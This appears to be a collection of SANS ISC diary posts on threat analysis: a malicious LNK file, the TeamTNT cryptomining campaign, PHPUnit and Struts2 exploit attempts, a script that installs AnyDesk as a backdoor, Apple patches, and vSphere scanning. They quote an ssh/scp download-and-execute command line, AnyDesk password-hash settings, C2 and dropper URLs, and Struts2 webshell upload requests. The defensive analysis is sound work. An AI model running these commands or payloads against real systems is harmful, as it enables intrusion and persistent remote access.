Christmas is at our doors and Attackers use the holiday season to deliver always more and more gifts into our mailboxes! I found this interesting file this morning: "christmas_slab.pdf.lnk"[1]. Link files (.lnk) are a classic way to execute something malicious on the victim's computer but the technique used here is interesting.

For a while, Microsoft added SSH support to Windows. I remember the first time I typed "ssh" into a command line and I did not get the wonderful message:

'ssh' is not recognized as an internal or external command

Because ssh is avaiable on many computers today, Attackers have a new way to deliver more malicious content using the SSH (read: SCP) protocol. That's the technique used by today's LNK file:

remnux@remnux:/MalwareZoo/20241220$ exiftool christmas_slab.pdf.lnk 
ExifTool Version Number         : 12.76
File Name                       : christmas_slab.pdf.lnk
Directory                       : .
File Size                       : 1992 bytes
File Modification Date/Time     : 2024:12:20 05:39:50-05:00
File Access Date/Time           : 2024:12:20 05:39:50-05:00
File Inode Change Date/Time     : 2024:12:20 05:39:50-05:00
File Permissions                : -rwx------
File Type                       : LNK
File Type Extension             : lnk
MIME Type                       : application/octet-stream
Flags                           : IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata
File Attributes                 : Archive
Create Date                     : 2024:10:09 05:37:10-04:00
Access Date                     : 2024:11:05 07:47:23-05:00
Modify Date                     : 2024:10:09 05:37:10-04:00
Target File Size                : 1243648
Icon Index                      : (none)
Run Window                      : Normal
Hot Key                         : (none)
Target File DOS Name            : ssh.exe
Drive Type                      : Fixed Disk
Drive Serial Number             : 280C-1822
Volume Label                    : 
Local Base Path                 : C:\Windows\System32\OpenSSH\ssh.exe
Relative Path                   : ..\..\..\Windows\System32\OpenSSH\ssh.exe
Working Directory               : C:\Program Files (x86)\Microsoft\Edge\Application
Command Line Arguments          : -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp root@17[.]43[.]12[.]31:/home/revenge/christmas-sale.exe c:\users\public\. && c:\users\public\christmas-sale.exe" revenge@17[.]43[.]12[.]31
Machine ID                      : christmas-destr

This LNK file will spawn a ssh.exe that will transfer a PE file and execute it. Note the nice executable filename! Once started, the same IP address + username is passed as a parameter to the malicious payload. Unfortunately, the SSH server is down and I wasn't able to retried the file.

Somethign else suspicious, the IP belows to Apple:

NetRange:       17.0.0.0 - 17.255.255.255
CIDR:           17.0.0.0/8
NetName:        APPLE-WWNET
NetHandle:      NET-17-0-0-0-1
Parent:          ()
NetType:        Direct Allocation
OriginAS:
Organization:   Apple Inc. (APPLEC-1-Z)
RegDate:        1990-04-16
Updated:        2023-11-15
Comment:        Geofeed https://ip-geolocation.apple.com
Ref:            https://rdap.arin.net/registry/ip/17.0.0.0

I discovered this file because I started to track the usage of "ssh.exe" in my hunting rules. Let's hope I will get more hits soon!

[1] https://www.virustotal.com/gui/file/8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

[This is a Guest Diary by James Levija, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

Executive Summary

TeamTNT is running a crypto mining campaign dubbed Spinning YARN. Spinning YARN focuses on exploiting Docker, Redis, YARN, and Confluence [2]. On November 4th, 2024, my DShield sensor recorded suspicious activity targeting my web server. The attacker attempted to use a technique that tricks the server into running harmful commands. This technique is known as server-side scripting vulnerability. This attack originated from IPv4 address %%ip:47.93.56.107%% targeting %%port:8090%%. The attacker used a technique to disguise their harmful code by encoding it. This technique hides the code’s true purpose and assists with avoiding detection against antivirus software and firewalls.

An analysis of the obfuscated code revealed that the command would send the victim to another website to download a malicious file. The malicious file dropped is named “w.sh” [3]. The purpose of this initial file is to install the requirements to run the intended malware and to download the intended malware from the site hxxp://b[.]9-9-8[.]com/brysj. Once the intended malware is downloaded, it runs and assesses the environment. It targets Linux distributions and cloud environments. The malware identifies possible cloud security and attempts to disable it to allow the rest of the code to run smoothly. The malware then sets up its persistence through creating secure keys to talk back to the attacker’s server and establishes a connection to the attacker’s server. It also uses techniques to hide itself on the victim’s device or cloud environment. Finally, the malware sets up a crypto miner to utilize the victim’s resources for the attacker’s gain.

Figure 1: Attack Flow

 

The impact of this attack extends beyond consuming system resources for cryptocurrency mining. The connection between the victim’s machine or cloud environment and the attacker grants the attacker persistent access. The attacker can abuse this through conducting additional exploits, steal sensitive data, or use the system to launch additional attacks on other systems. TeamTNT is known to have created a work that could steal Amazon Web Service (AWS) credentials. This poses significant risks to operational security and data integrity for any organization.

This attack highlights evolving threats to Linux and cloud environments from sophisticated groups like TeamTNT. Organizations should prioritize securing their infrastructure through regular updates, monitoring suspicious activity, staying up to date on cyber threat intelligence, and implementing robust defenses against malware and their obfuscation techniques. Collaboration withing the cybersecurity community is key to mitigating these ongoing threats.

TeamTNT – Background

TeamTNT is a cyber threat group that has been active since October 2019. The group is well known for their attacks on cloud environments and cryptojacking [4]. The location of the group members is unknown, but they are suspected of being in Germany due to TeamTNT’s X (formerly Twitter) account, with the handle @HildeTnT, sending tweets in English and German [5]. In December 2020, the group was suspected to have 12 members based on a tweet about their group of programmers [6].

Figure 2: Tweet from TeamTNT referencing the number of programmers [6].

 

Indicators of Compromise (IoCs)

Identified Malicious Domains and URLs

Below are the malicious URLs observed in the binaries:

• Domain – hxxps://9-9-8[.]com
• Main URL - hxxps://b[.]9-9-8[.]com/brysj/
• Dropper URL - hxxps://b[.]9-9-8[.]com/brysj/w[.]sh
• Miner URL – hxxps://b[.]9-9-8[.]com/brysj/d/ar[.]sh
• Miner URL - hxxps://b[.]9-9-8[.]com/brysj/m/enbash[.]tar
• Remote Shell - hxxps://b[.]9-9-8[.]com/brysj/m/enbio[.]tar
• Additional URLs – hxxps://m[.]9-9-8[.]com

IPs Involved

IP Address	Last Seen
%%ip:52.223.13.41%%	2024-11-26
%%ip:194.36.190.32%%	2024-11-13
%%ip:158.160.116.91%%	2024-10-20
%%ip:212.233.121.136%%	2024-09-01
%%ip:62.113.111.152%%	2024-08-15
%%ip:185.208.207.89%%	2024-08-01
%%ip:154.38.165.7%%	2024-07-16
%%ip:114.114.114.114%%	2024-12-02

Figure 3: IP addresses seen.

Associated Files and Hashes

Filename	Notes	Hash
w.sh	Dropper	d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e3a6635bbaeb7eb6e
ar.sh	Dropper	64d8f887e33781bb814eaefa98dd64368da9a8d38bd9da4a76f04a23b6eb9de5
hf.tar		651a3034429358a0ccb2d58ecbe2b7f3e4ee1bf4bee3e7a86f7ca873f6049ec2
diamorphine.c		aec68cfa75b582616c8fbce22eecf463ddb0c09b692a1b82a8de23fb0203fede
diamorphine.h		d27eeb48b1a74efd8710ef4ce62ee8469dd2352b0079c5b1c82e8da43fe932a2
Makefile		d15af7984ed9b33093d7d5725c84ab24edf7c4ff02af3ac0a6c3aa9d5f7e12f4
Makefile		5b9acfd34a30a3f26db492ed4404d518d583c0088a38a7622b683407c34b9108
processhider.c		7e84f9aab329754fe4681d4d6e4c64098731fd55b5998d7cfacb08ba4dbdfd5c
enbash.tar		9eafaf5e0fb9a91f2887f3e81fd7ad6d70973ff7cbb807dab4bf0f319a668b95
debash.tar		18137be62c9267cf6b0b40432a91c5818c66bdaa42aad3728c598d3fc65fdcff
bash.sh		b2e26c7ce901296822085164ede73557a10badfdf99d1aa30f338446d0beb2d7
enbio.tar		bb89a6bbddc5dda36542a5fef230b8fa9d98fbdb0ec4fa1794b8c28a0b5a3af4
debio.tar		e137bf61096f68478a0daa63fca1b2cc45a99f2dfdcd08d7ff7c449f38cf5ce9
fkoths	Checks for docker containers	afddbaec28b040bcbaa13decdc03c1b994d57de244befbdf2de9fe975cae50c4
sshd	Xmrig Miner	bbcdffd6fa3b1370dfc091bfd3bfca38be013f72f94af7ef29466d911c9604d8
bioset	Establishes reverse shell	0c7579294124ddc32775d7cf6b28af21b908123e9ea6ec2d6af01a948caf8b87
cronb.sh		d4508f8e722f2f3ddd49023e7689d8c65389f65c871ef12e3a6635bbaeb7eb6e

Figure 4: Set of files used for this attack.

 

Tools and Tactics Used

Malware Insights

Server-Side injection attack

1. Attempts to execute an HTTP GET request to download the file w.sh from hxxp[://]b[.]9-9-8[.]com/brysj/w[.]sh
2. Attempts to execute the file

 

w.sh

1. Path and domain variables are set
   1. Domain = b[.]9-9-8[.]com
   2. Main URL = hxxp[://]b[.]9-9-8[.]com/brysj
2. Bash script checks if the chattr utility is present then renames it to zzhcht and exports the contents.
   1. This is a tactic used by TeamTNT prior to “quitting” in 2021. [7]
3. If chattr is not present, it installs the chatter utility, renames it, and exports the contents.
   1. It tries both yum install and apt install
4. Executes an HTTP GET request to download the file ar.sh from hxxp[://]b[.]9-9-8[.]com/brysj/ar[.]sh

 

MITRE ATT&CK Framework Mapping

FIgure 5: MITRE ATT&CK mapping for w.sh [3].

 

ar.sh – Primary file

Figure 6: Attack flow of ar.sh

 

Packages installed by ar.sh:

• agcc
  • “GNU Compiler Collections which is used to compile mainly C and C++ language [8].” 
• kmod
  • kmod is a set of tools to handle common tasks with Linux kernel modules like insert, remove, list, check properties, resolve dependencies and aliases [9].”
• make
  • “Assists in the compilation process and is a must-have tool for building large applications [10].”
• linux-headers
  • “A package providing the Linux kernel headers [11].” 
• net-tools
  • “This package includes the important tools for controlling the network subsystem of the Linux kernel. This includes arp, ifconfig, netstat, rarp, nameif and route. Additionally, this package contains utilities relating to particular network hardware types (plipconfig, slattach, mii-tool) and advanced aspects of IP configuration (iptunnel, ipmaddr) [12].”
• masscan
  • “MASSCAN is TCP port scanner which transmits SYN packets asynchronously and produces results similar to nmap, the most famous port scanner [13].”
• sshd
  • XMRig 6.20.1-dev payload
• pnscan
  • “Pnscan is a multi threaded port scanner that can scan a large network very quickly. If does not have all the features that nmap have but is much faster [14].”
• httpd
  • “the Apache HyperText Transfer Protocol (HTTP) server program [15].”
• bioset
  • Payload to establish a reverse shell using Platypus
    • Platypus is “a modern multiple reverse shell sessions/client manager via terminal written in go” [16].

 

MITRE ATT&CK Framework Mapping

Figure 7: MITRE ATT&CK matrix for ar.sh [17]

 

fkoths

This binary retrieves and deletes docker images from the host.

Figure 8: Main.main function of fkoths in BinaryNinja.

 

MITRE ATT&CK Framework Mapping

Figure 9: MITRE ATT&CK matrix for fkoths.

 

sshd

The binary sshd is the payload for the XMRig miner. This one runs on XMRig 6.20.1-dev.

Figure 10: Snippet of the XMRig Miner code from sshd in BinaryNinja.

 

MITRE ATT&CK Framework Mapping

Figure 11: MITRE ATT&CK matrix for sshd [18].

 

bioset

The bioset binary establishes a reverse shell allowing the attacker to interact with the system remotely. Bioset uses multiple tools from GitHub repositories including:

• Go-Daemon
  • “Library for writing system daemons in Go [19].”
• Platypus
  • “A modern multiple reverse shell sessions/clients manager via terminal written in go [16].”
    
    
    Figure 12: Features of the Platypus reverse shell tool [16].
     
• Xz
  • “This Go language package supports the reading and writing of xz compressed streams [20].”
• Pty
  • “Pty is a Go package for using unix pseudo-terminals [21].”
• Go-socks5
  • “Provides the socks5 package that implements a SOCKS5 server. SOCKS (Secure Sockets) is used to route traffic between a client and server through an intermediate proxy layer. This can be used to bypass firewalls or NATs [22].”
• Freeport
  • “Get a free open TCP port that is ready to use [23].”

 

When looking at the code in BinaryNinja, the reverse shell reaches back to m[.]9-9-8[.]com over %%port:14447%%.

Figure 13: Snippet of the bioset code showing the reverse shell destination and port

 

MITRE ATT&CK Framework Mapping

Figure 14: MITRE ATT&CK matrix for bioset [24]

 

 

References

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/

[2]     M. Muir, "CADO Security," 6 March 2024. [Online]. Available: https://www.cadosecurity.com/blog/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence. [Accessed 5 December 2024].

[3]     Joe Sandbox, "Linux Analysis Report - w.sh," 07 03 2024. [Online]. Available: https://www.joesandbox.com/analysis/1404813/0/html#mitre-pagination. [Accessed 05 12 2024].

[4]     C. Will Thomas and C. Darin Smith, "MITRE ATT&CK," [Online]. Available: https://attack.mitre.org/groups/G0139/.

[5]     M. Project, "Malpedia," [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/actor/teamtnt.

[6]     Cloudsek, "Cloudsek," [Online]. Available: https://www.cloudsek.com/threatintelligence/timeline-ttps-of-teamtnt-cybercrime-group.

[7]     S. Bharti, "TeamTNT Returns - Or Does It?," 19 10 2022. [Online]. Available: https://www.trendmicro.com/en_us/research/22/j/teamtnt-returns-or-does-it.html. [Accessed 5 12 2024].

[8]     Geeks for Geeks, "gcc command in linux with examples," 21 11 2021. [Online]. Available: https://www.geeksforgeeks.org/gcc-command-in-linux-with-examples/. [Accessed 09 12 2024].

[9]     lucasdemarchi, "kmod-project," 30 06 2022. [Online]. Available: https://github.com/kmod-project/kmod. [Accessed 09 12 2024].

[10]     Phoenix NAP Global IT Services, "Linux make Command," 23 10 2024. [Online]. Available: https://phoenixnap.com/kb/linux-make-command. [Accessed 09 12 2024].

[11]     Gentoo Linux, "Linux-headers," [Online]. Available: https://wiki.gentoo.org/wiki/Linux-headers. [Accessed 09 12 2024].

[12]     Offensive Security, "net-tools," [Online]. Available: https://www.kali.org/tools/net-tools/. [Accessed 09 12 2024].

[13]     Offensive Security, "masscan," [Online]. Available: https://www.kali.org/tools/masscan/. [Accessed 09 12 2024].

[14]     Offensive Security, "pnscan," [Online]. Available: https://www.kali.org/tools/pnscan/. [Accessed 09 12 2024].

[15]     Apache, "httpd - Apache Hypertext Transfer Protocol Server," [Online]. Available: https://httpd.apache.org/docs/2.4/programs/httpd.html. [Accessed 09 12 2024].

[16]     W. Yihang, "Platypus," 16 07 2021. [Online]. Available: https://github.com/WangYihang/Platypus. [Accessed 06 12 2024].

[17]     Joe Sandbox, "Linux Analysis Report - y0YuUxDd.sh.part," 06 03 2024. [Online]. Available: https://www.joesandbox.com/analysis/1404305/0/html#mitre-pagination. [Accessed 06 12 2024].

[18]     Joe Sandbox, "Joe Sandbox - Linux Analysis Report sshd," [Online]. Available: https://www.joesandbox.com/analysis/1568671/0/html#mitre-pagination. [Accessed 06 12 2024]

[19]     sevlyar, "go-daemon," 08 07 2022. [Online]. Available: https://github.com/sevlyar/go-daemon. [Accessed 09 12 2024].

[20]     ulikunitz, "xz," [Online]. Available: https://github.com/ulikunitz/xz/. [Accessed 09 12 2024].

[21]     creack, "pty," [Online]. Available: https://github.com/creack/pty. [Accessed 09 12 2024].

[22]     armon, "go-socks5," [Online]. Available: https://github.com/armon/go-socks5. [Accessed 09 12 2024].

[23]     phayes, "freeport," [Online]. Available: https://github.com/phayes/freeport. [Accessed 09 12 2024].

[24]     Joe Sandbox, "Linux Analysis Report - bioset," [Online]. Available: https://www.joesandbox.com/analysis/1568738/0/html#mitre-pagination. [Accessed 06 12 2024].

[25]     m0nad, "m0nad/Diamorphine," 09 2023. [Online]. Available: https://github.com/m0nad/Diamorphine. [Accessed 05 12 2024].

[26]     Threat Insights Portal, "Threat Insights Portal -ar.sh," 11 11 2024. [Online]. Available: https://tip.neiki.dev/file/64d8f887e33781bb814eaefa98dd64368da9a8d38bd9da4a76f04a23b6eb9de5/content. [Accessed 06 12 2024].

 

 

--
Jesse La Grew
Handler

[This is a Guest Diary by Sahil Shaikh, an ISC intern as part of the SANS.edu BACS program]

Introduction

CVE-2017-9841 is a vulnerability is a security flaw in PHPUnit before 4.8.28 and 5.x before 5.6.3. This flaw allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring. Some examples of the same have been given below.

The IP Address which is 83.222.191.62 seems to originate from Bulgaria, Perkin. According to multiple sites such as GreyNoise, Shodan and Threatstop the IP is malicious and has been seen attempting to use various CVEs.

According to firewall reports collected from the honeypot, the IP address was seen a total of 198 times starting November 1st. The IP was seen 92 times on November 2. According to the web honeypot reports the IP was only seen on November 17th, but around 69 times. It attempted remote code executing using different URL combinations.

The vulnerability exists due to an insecure eval() function call in PHPUnit’s Eval-stdin.php file, which allows an attacker to execute arbitrary PHP code if they have access to the script. This access can be because of environment misconfiguration which makes PHPUnit accessible to the attacker.

An attacker identifies a web server with exposed PHPUnit testing suite ---> Attacker sends a malicious payload to the Eval-stdin.php script ---> Script executes the payload granting the attacker RCE capabilities.

It has a CVSS v3 score of 9.8 (Critical). Impact of this CVE can be RCE leading to running of arbitrary commands, installation of malware, compromission of server and other infrastructure in the same network and possible loss of (CIA) Confidentiality, Integrity and Availability of Data.

Androxgh0st Malware

FBI and CISA released a joint advisory regarding the Androxgh0st Malware to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. It also talks about the malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.

• It’s a python-based malware that targets web applications and servers. Focuses on credential exfiltration, particularly .env files storing sensitive credentials for AWS, Office 365, Twilio, and more. Furthermore, it is also capable of building a botnet using the exploited systems for reconnaissance and further exploitation.
• Exploits vulnerabilities like CVE-2017-9841 (PHPUnit) and CVE-2021-41773 (Apache HTTP Server). Uses both GET and POST requests to scan and exploit vulnerable endpoints. Deploys backdoors and web shells to maintain persistent access.
• Indicators of Compromise Include targeting of endpoints such as  { /.env } and
• {  /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php   }
• This vulnerability has impacted multiple platforms, including Drupal, WordPress, MediaWiki, and Moodle, due to their use of vulnerable PHPUnit versions.
• Modules like Mailchimp and Mailchimp E-Commerce bundled the vulnerable PHPUnit versions, exposing over 25,000 Drupal sites to exploitation.
• Even after updating or uninstalling vulnerable modules, residual files like eval-stdin.php might still exist on servers, leaving them exposed.

Exposing of AWS Keys

• Androxgh0st exploits misconfigurations in web applications to extract sensitive information, including AWS keys, and facilitates abuse such as spamming, cryptojacking, and more.
• It scans and targets .env files containing secrets for AWS, SendGrid, Twilio, and others.
• Exploits credentials for spamming by assessing email limits with the GetSendQuota API.
• Parses AWS keys from exposed files and also escalates access to AWS Management Console via API automation.

Detection and Prevention

•    Network Monitoring
    1.    Using IDS/IPS, firewall, packet analyser.
    2.    Detect user agents performing .env scans or POST requests with androxgh0st.
    3.    Monitor AWS API activity for anomalies in GetSendQuota, CreateUser, and similar calls.
•    Environment Hardening
    1.    Making sure sensitive files like .env are not accessible to the public.
    2.    Restricting access to sensitive files using ACLs.
    3.    Implementing network segmentation and segregation to limit the impact of an attack.
    4.    Making sure that all software being used it patched and updated regularly.
•    Credential Management
    1.    Implementing a password policy in accordance with NIST guidelines.
    2.    Rotating passwords and AWS/Cloud Keys every 60 days.
    3.    Following the principle of least privilege when assigning privileges to any role or user.
•    Statistical Analysis
    1.    Using statistical analysis on the data collected by the company to know what is normal and what is not.
    2.    This can help in detecting abnormal activity that might go undetected.
    3.    Use K-Means Clustering to group IPs based on activity metrics such as request frequency, endpoints targeted, or geographic origin.
    4.    Centralizing logs and correlating failed login attempts with spikes in API calls to identify brute-force attempts.

[1] https://nvd.nist.gov/vuln/detail/CVE-2017-9841
[2] https://viz.greynoise.io/ip/83.222.191.62
[3] https://www.threatstop.com/check-ioc
[4] https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a
[5] https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys
[6] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

RATs or “Remote Access Tools” are very popular these days. From an attacker’s point of view, it’s a great way to search and exfiltrate interesting data but also to pivot internally in the network. Besides malicious RATs, they are legit tools that are used in many organisations to perform “remote administration”. Well-known tools are: VNC, TeamViewer, AnyDesk and much more!

Yesterday, I found an interesting piece of Python script that will install AnyDesk[1] on the victim’s computer. Even better, it reconfigures the tool if it is already installed. The script, called “an5.py” has a low VT score (6/63)[2]. Note that the script is compatible with Windows and Linux victims. 

The script uses the following process to install and opens AnyDesk:

In case of a regular deployment, AnyDesk does not setup an unattended password but it’s technically possible to implement this by adding the following lines in the configuration:

ad.anynet.pwd_hash=967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d
ad.anynet.pwd_salt=351535afd2d98b9a3a0e14905a60a345
ad.anynet.token_salt=e43673a2a77ed68fa6e8074167350f8f

If these lines (ad.anynet.*) already exist in the discovered configuration file, they are overwritten. Otherwise, they are just added.

Once AnyDesk has been installed and reconfigured, it is restarted and victim's details are exfiltrated to the attacker:

The C2 server is hxxp://95[.]164[.]17[.]24:1224 but it seems down at the moment. Why reinvent the wheel if you can use a cool remote access tool?

[1] https://anydesk.com/en
[2] https://www.virustotal.com/gui/file/ef9a19e2b1c1c9d41d6b43ea3836993d004782de86e5b9c9f9b02292e50c904a

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Last week, Apache announced a vulnerability in Struts2 [1]. The path traversal vulnerability scored 9.5 on the CVSS scale. If exploited, the vulnerability allows file uploads into otherwise restricted directories, which may lead to remote code execution if a webshell is uploaded and exposed in the web root. I call the exploit attempts below "inspired" by this vulnerability. There are at least two vulnerabilities that could be targeted. I do not have a vulnerable system to test if the exploit will work.

Patching this vulnerability is not quite as straightforward as it should be. Apache points out:

This change isn't backward compatible as you must rewrite your actions to start using the new Action File Upload mechanism and related interceptor. Keep using the old File Upload mechanism keeps you vulnerable to this attack.

The vulnerability, CVE-2024-53677, appears to be related to CVE-2023-50164. The older vulnerability is similar, and an incomplete patch may have led to the newer issue. PoC exploits have been released (see, for example, [2]). And we are seeing active exploit attempts for this vulnerability that match the PoC exploit code. At this point, the exploit attempts are attempting to enumerate vulnerable systems:

POST /actionFileUpload HTTP/1.1
Host: [honeypot IP address]:8090
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 222
Content-Type: multipart/form-data; boundary=0abcfc26e3fa0afbd6db1ba369dfcc37

--0abcfc26e3fa0afbd6db1ba369dfcc37
Content-Disposition: form-data; name="file"; filename="exploit.jsp"
Content-Type: application/octet-stream

<% out.println("Apache Struts"); %>
--0abcfc26e3fa0afbd6db1ba369dfcc37--

This attempt uploads a one-liner script that is supposed to return "Apache Struts". Next, the attacker attempts to find the uploaded script. The exploit attempt is very close to the original PoC. Since then, a slightly improved exploit has been uploaded to the same GitHub repository.

GET /actionFileUpload/exploit.jsp HTTP/1.1
Host: [honeypot IP]:8090
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive

So far, the scans originate only from %%ip:169.150.226.162%%, an IP address that started scanning yesterday, initially for simple URLs like "/" and "/cbs" (likely another upload vulnerability).

 

 

 

[1] https://cwiki.apache.org/confluence/display/WW/S2-067
[2] https://github.com/TAM-K592/CVE-2024-53677-S2-067

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Apple today released patches for all of its operating systems. The updates address 46 different vulnerabilities. Many of the vulnerabilities affect more than one operating system. None of the vulnerabilities are labeled as being already exploited.

 

iOS 18.2 and iPadOS 18.2	iPadOS 17.7.3	macOS Sequoia 15.2	macOS Sonoma 14.7.2	macOS Ventura 13.7.2	watchOS 11.2	tvOS 18.2	visionOS 2.2
CVE-2023-32395: An app may be able to modify protected parts of the file system. Affects Perl
		x
CVE-2024-44201: Processing a malicious crafted file may lead to a denial-of-service. Affects libarchive
	x		x	x
CVE-2024-44220: Parsing a maliciously crafted video file may lead to unexpected system termination. Affects AppleGraphicsControl
		x	x
CVE-2024-44224: A malicious app may be able to gain root privileges. Affects StorageKit
		x	x	x
CVE-2024-44225: An app may be able to gain elevated privileges. Affects libxpc
x	x	x	x	x	x	x
CVE-2024-44243: An app may be able to modify protected parts of the file system. Affects StorageKit
		x
CVE-2024-44245: An app may be able to cause unexpected system termination or corrupt kernel memory. Affects Kernel
x	x	x	x				x
CVE-2024-44246: On a device with Private Relay enabled, adding a website to the Safari Reading List may reveal the originating IP address to the website. Affects Safari
x	x	x
CVE-2024-44248: A user with screen sharing access may be able to view another user's screen. Affects Screen Sharing Server
			x	x
CVE-2024-44291: A malicious app may be able to gain root privileges. Affects Foundation
		x	x	x
CVE-2024-44300: An app may be able to access protected user data. Affects Crash Reporter
		x	x	x
CVE-2024-54465: An app may be able to elevate privileges. Affects LaunchServices
		x
CVE-2024-54466: An encrypted volume may be accessed by a different user without prompting for the password. Affects DiskArbitration
		x	x	x
CVE-2024-54476: An app may be able to access user-sensitive data. Affects PackageKit
		x	x	x
CVE-2024-54477: An app may be able to access user-sensitive data. Affects Apple Software Restore
		x	x	x
CVE-2024-54479: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
	x
CVE-2024-54484: An app may be able to access user-sensitive data. Affects MediaRemote
		x
CVE-2024-54485: An attacker with physical access to an iOS device may be able to view notification content from the lock screen. Affects VoiceOver
x	x
CVE-2024-54486: Processing a maliciously crafted font may result in the disclosure of process memory. Affects FontParser
x	x	x	x	x	x	x	x
CVE-2024-54489: Running a mount command may unexpectedly execute arbitrary code. Affects Disk Utility
		x	x	x
CVE-2024-54490: A local attacker may gain access to user's Keychain items. Affects AppleMobileFileIntegrity
		x
CVE-2024-54491: A malicious application may be able to determine a user's current location. Affects Logging
		x
CVE-2024-54492: An attacker in a privileged network position may be able to alter network traffic. Affects Passwords
x	x	x					x
CVE-2024-54493: Privacy indicators for microphone access may be attributed incorrectly. Affects Shortcuts
		x
CVE-2024-54494: An attacker may be able to create a read-only memory mapping that can be written to. Affects Kernel
x	x	x	x	x	x	x	x
CVE-2024-54495: An app may be able to modify protected parts of the file system. Affects Swift
		x	x
CVE-2024-54498: An app may be able to break out of its sandbox. Affects SharedFileList
		x	x	x
CVE-2024-54500: Processing a maliciously crafted image may result in disclosure of process memory. Affects ImageIO
x	x	x	x	x	x	x	x
CVE-2024-54501: Processing a maliciously crafted file may lead to a denial of service. Affects SceneKit
x	x	x	x	x	x	x	x
CVE-2024-54502: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
x		x			x	x	x
CVE-2024-54503: Muting a call while ringing may not result in mute being enabled. Affects Audio
x
CVE-2024-54504: An app may be able to access user-sensitive data. Affects Notification Center
		x
CVE-2024-54505: Processing maliciously crafted web content may lead to memory corruption. Affects WebKit
x	x	x			x	x	x
CVE-2024-54506: An attacker may be able to cause unexpected system termination or arbitrary code execution in DCP firmware. Affects IOMobileFrameBuffer
		x
CVE-2024-54508: Processing maliciously crafted web content may lead to an unexpected process crash. Affects WebKit
x		x			x	x	x
CVE-2024-54510: An app may be able to leak sensitive kernel state. Affects Kernel
x	x	x	x	x	x	x
CVE-2024-54513: An app may be able to access sensitive user data. Affects Crash Reporter
x		x			x	x	x
CVE-2024-54514: An app may be able to break out of its sandbox. Affects libxpc
x		x	x	x	x	x
CVE-2024-54515: A malicious app may be able to gain root privileges. Affects SharedFileList
		x
CVE-2024-54524: A malicious app may be able to access arbitrary files. Affects SharedFileList
		x
CVE-2024-54526: A malicious app may be able to access private information. Affects AppleMobileFileIntegrity
x		x	x	x	x	x
CVE-2024-54527: An app may be able to access sensitive user data. Affects AppleMobileFileIntegrity
x		x	x	x	x	x
CVE-2024-54528: An app may be able to overwrite arbitrary files. Affects SharedFileList
		x	x	x
CVE-2024-54529: An app may be able to execute arbitrary code with kernel privileges. Affects Audio
		x	x	x
CVE-2024-54531: An app may be able to bypass kASLR. Affects Kernel
		x
CVE-2024-54534: Processing maliciously crafted web content may lead to memory corruption. Affects WebKit
x		x			x	x	x

[This is a Guest Diary by Jean-Luc Hurier, an ISC intern as part of the SANS.edu BACS program]

Background

In April 2020, at the height of the global pandemic, virtualization was in high demand.  During that time, vSphere 7.0 was released. With that release, had two unknown vulnerabilities – a match made in heaven for threat actors. It wasn’t until June 2024 that China’s TZL security researchers revealed CVE-2024-38812 and CVE-2024-38813 at China’s 2024 Matrix Cup – a hacking contest.  Since then, both vulnerabilities were published and patched in September, however one of those patches required a hotfix just a month later (CVE-2024-38812).

Findings

The reason that this is a topic of conversation is because I noticed an intermittent pattern of reconnaissance of possible vSphere related web traffic over the course of the last 3.5 months.

On the surface, this is part of any other automated scan. They cover a lot of ground, probing for openings, vulnerabilities, etc. The URI /sdk stands out because it is a known endpoint for vSphere SOAP APIs. This could be a coincidence, but what I did notice is a slight uptick in scanning for that endpoint starting 9/18/2024. This is notably interesting due to the fact of CVE-2024-33812 and CVE-2024-33813 being public on 9/17/2024.

This activity spanned across 22 not-so-reputable IPs from providers based in USA, Germany, and Spain – most of which are associated to DigitalOcean. For /sdk: since the POST request content-length was short and included text/plain content, then the assumption is that the activity is merely looking for the existence of vSphere. The same can be said for /webui, which can be tied to vSphere’s legacy web client, which indicates an interest in older endpoints (and older vulnerabilities). The rare case of /ui/authentication GET requests also indicates probing instead of actual attempts of an exploit.  The IPs didn’t solely scan for vSphere endpoints – they also targeted other exposed management interfaces, web portals, configuration files, and source-code repositories. Analysis of other vSphere endpoints did not yield any other indicators.  

An interesting artifact of note is the use of User-Agent string related to Odin – an “AI” powered scanner to catalog internet assets.

While there is no public proof of concept, this activity piqued my interest – especially as it relates to a very recent post (11/18/2024) by Broadcom stating, “Updated advisory to note that VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813” [2].

Theory

